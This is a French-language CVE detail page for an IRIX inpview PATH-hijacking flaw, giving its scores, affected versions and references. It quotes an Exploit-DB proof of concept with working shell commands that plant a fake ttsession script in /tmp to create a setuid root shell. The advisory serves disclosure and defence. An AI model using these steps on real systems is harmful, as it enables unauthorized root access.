CVE-1999-1461 : Détail

CVE-1999-1461

0.04%V3
Local
2001-09-12
02h00 +00:00
2024-08-01
17h18 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

inpview in InPerson on IRIX 5.3 through IRIX 6.5.10 trusts the PATH environmental variable to find and execute the ttsession program, which allows local users to obtain root access by modifying the PATH to point to a Trojan horse ttsession program.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 19304

Date de publication : 1997-05-06 22h00 +00:00
Auteur : Yuri Volobuev
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/381/info The inpview utility, included by SGI in its Irix operating system, contains a vulnerability that will allow any local user to obtain root access. inpview is part of the InPerson dektop video conferencing package. As it needs to access a video capture device, it is setuid root, and attempts to run the "ttsession" utility using the system() library call. It does not specificy an explicit path, and as such will execute the first program or script named "ttsession" in the users path. By setting /tmp to be first in your path, creating a shell script in /tmp call ttsession, and making it executable, this shell script will be executed as root. % cat > /tmp/ttsession #!/bin/sh cp /bin/sh /tmp/rootshell chmod 4755 /tmp/rootshell ^D % chmod 755 /tmp/ttsession % inpview& % /tmp/rootshell #

Products Mentioned

Configuraton 0

Sgi>>Irix >> Version 5.3

Sgi>>Irix >> Version 6.1

Sgi>>Irix >> Version 6.2

Sgi>>Irix >> Version 6.3

Sgi>>Irix >> Version 6.4

Sgi>>Irix >> Version 6.5.10

Références

http://marc.info/?l=bugtraq&m=87602167420921&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/381
Tags : vdb-entry, x_refsource_BID